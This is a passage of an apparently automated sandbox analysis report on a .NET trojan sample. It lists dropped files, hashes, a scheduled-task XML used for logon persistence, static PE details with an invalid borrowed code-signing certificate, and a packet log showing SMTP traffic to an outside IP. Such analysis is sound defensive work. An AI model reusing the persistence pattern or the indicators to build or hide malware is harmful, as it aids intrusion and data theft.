                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2232
                                                      Entropy (8bit):5.380134126512796
                                                      Encrypted:false
                                                      SSDEEP:48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:+LHxvIIwLgZ2KRHWLOug8s
                                                      MD5:F37AEC77E01BBB962825154484185140
                                                      SHA1:4EB2AF977817681D7A1EB59060C0DD62A166C7D4
                                                      SHA-256:CB443439A2777B9803D5D93B8FD4DCA1F2544148EF27123006E92C8ADF05DD6F
                                                      SHA-512:371FBFCB6FAB236D5C88B2BB6E3322A1A265AF88BD4238319C56569F93163CA10CDE73D1E92DD550C9F7040769DE7DD28A9BACB48763749173CFC2372B40B72F
                                                      Malicious:false
                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fuehawq.v5v.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfcc231m.bdy.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0af0yr3.l2b.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5t5ijhw.djf.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\tmpD46C.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1605
                                                      Entropy (8bit):5.118391254073854
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuThv
                                                      MD5:C2A32E5CCC1C9612639FC5E43C8196B5
                                                      SHA1:90D80C9D356AFE0BBD2824C31DE951F2E419FE43
                                                      SHA-256:C5224A48B5EAB09F3578AFFEDC34BEBE4DBB13DCD502B93653926EF28DB082B9
                                                      SHA-512:76897647DBAB0A4E977614705B955760DF0200EE07EEC0B8C731FA3A22EC4534B43DB1888638F1AA6E45C6FB170F0A1990177CBB760E79A21F803DC0CD2E2E8E
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                      C:\Users\user\AppData\Local\Temp\tmpE610.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1605
                                                      Entropy (8bit):5.118391254073854
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuThv
                                                      MD5:C2A32E5CCC1C9612639FC5E43C8196B5
                                                      SHA1:90D80C9D356AFE0BBD2824C31DE951F2E419FE43
                                                      SHA-256:C5224A48B5EAB09F3578AFFEDC34BEBE4DBB13DCD502B93653926EF28DB082B9
                                                      SHA-512:76897647DBAB0A4E977614705B955760DF0200EE07EEC0B8C731FA3A22EC4534B43DB1888638F1AA6E45C6FB170F0A1990177CBB760E79A21F803DC0CD2E2E8E
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                      C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):736776
                                                      Entropy (8bit):7.955962375070328
                                                      Encrypted:false
                                                      SSDEEP:12288:ynFdsbu/AnrQhcslq/AeMs+Hc1m51dkKbmxnkpKR9O+hX4PkR:DJMnlqOcb1CG9vhIK
                                                      MD5:AA4E9485A220716BCA4854AC0007A125
                                                      SHA1:60BD405DAE72469A7104EF7DF6E714C141085DC8
                                                      SHA-256:79E473FB7F021D7B394AC013C2ABCCA1A094A918B6F2EDB48C0ED18D7B3B7460
                                                      SHA-512:EBC54A074D35C4B11F9C3BDCC27735C8E867B21FB4D824D8587F39461F35F2C07EC81DC6A4EC960ACB981D52BD22BF0B164BC9D4C71E3CC3909ECBAD11D64D72
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                      • Antivirus: Virustotal, Detection: 32%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................r.... ... ....@.. .......................`............@.....................................W.... ...................6...@....................................................... ............... ..H............text...x.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................T.......H............2......(....m...g..........................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....oY...:q....(....+..(........}.........(......*................n..}.....{....,..{....oG...*..{....*.s..

                                                      C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.955962375070328
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      File size:736'776 bytes
                                                      MD5:aa4e9485a220716bca4854ac0007a125
                                                      SHA1:60bd405dae72469a7104ef7df6e714c141085dc8
                                                      SHA256:79e473fb7f021d7b394ac013c2abcca1a094a918b6f2edb48c0ed18d7b3b7460
                                                      SHA512:ebc54a074d35c4b11f9c3bdcc27735c8e867b21fb4d824d8587f39461f35f2c07ec81dc6a4ec960acb981d52bd22bf0b164bc9d4c71e3cc3909ecbad11d64d72
                                                      SSDEEP:12288:ynFdsbu/AnrQhcslq/AeMs+Hc1m51dkKbmxnkpKR9O+hX4PkR:DJMnlqOcb1CG9vhIK
                                                      TLSH:1BF423C43674A54FDBAD1BB910A8AB03B3B4ED4371C4E5CC28D386D519DDBB3168286B
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................r.... ... ....@.. .......................`............@................................

                                                      File Icon

                                                      Icon Hash:90b2a1b1b1b3b984

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4b0872
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x660CB9B3 [Wed Apr 3 02:06:43 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                      Subject Chain
                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                      Version:3
                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                      Serial:7C1118CBBADC95DA3752C46E47A27438

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb08180x57.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x1918.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xb08000x3608
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xae8780xaea007c7be54a83e3da2da5a8291ce2513d30False0.9448679089119542Applesoft BASIC program data, first line number 117.963501773145212IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xb20000x19180x1a0094e0c4590760d0ec0a51d60cb69c05e0False0.7708834134615384data6.915579403800766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xb40000xc0x20017c160a199b26efda15cd9b5f7be4894False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xb20e80x1417PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8876142329379739
                                                      RT_GROUP_ICON0xb35000x14data1.05
                                                      RT_VERSION0xb35140x404data0.4260700389105058

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 3, 2024 06:19:10.980556965 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:10.980590105 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:10.980684042 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:10.987977982 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:10.987986088 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:11.253767967 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:11.253853083 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:11.257438898 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:11.257446051 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:11.257708073 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:11.308973074 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:11.312374115 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:11.356240988 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:11.606765032 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:11.606812954 CEST44349707104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:11.606868029 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:11.612709999 CEST49707443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:12.934146881 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:13.174462080 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:13.174540997 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:13.422032118 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:13.423819065 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:13.664356947 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:13.664539099 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:13.905740976 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:13.906196117 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:14.153614044 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.153693914 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.153758049 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.153758049 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:14.153773069 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.153834105 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:14.154467106 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.188690901 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:14.429208994 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.432230949 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:14.672688961 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.676687956 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:14.917870045 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:14.918858051 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:15.124079943 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.124141932 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.124237061 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.127669096 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.127701998 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.161902905 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:15.163942099 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:15.384902000 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.384994030 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.387871027 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.387897968 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.388169050 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.404278040 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:15.404491901 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:15.449641943 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.463429928 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.508241892 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.648977041 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:15.649214029 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:15.737916946 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.739065886 CEST44349711104.26.12.205192.168.2.7
                                                      Apr 3, 2024 06:19:15.739145041 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.741821051 CEST49711443192.168.2.7104.26.12.205
                                                      Apr 3, 2024 06:19:15.889543056 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:15.890316010 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:15.890400887 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:15.890424013 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:15.890445948 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:16.132332087 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:16.132455111 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:16.132570982 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:16.132607937 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:16.133538961 CEST5874970989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:16.321418047 CEST49712587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:16.355874062 CEST49709587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:16.561597109 CEST5874971289.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:16.561681986 CEST49712587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:16.809438944 CEST5874971289.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:16.809633017 CEST49712587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:17.050934076 CEST5874971289.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:17.051142931 CEST49712587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:17.292526007 CEST5874971289.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:19:17.293534994 CEST49712587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:19:17.539555073 CEST5874971289.249.49.141192.168.2.7
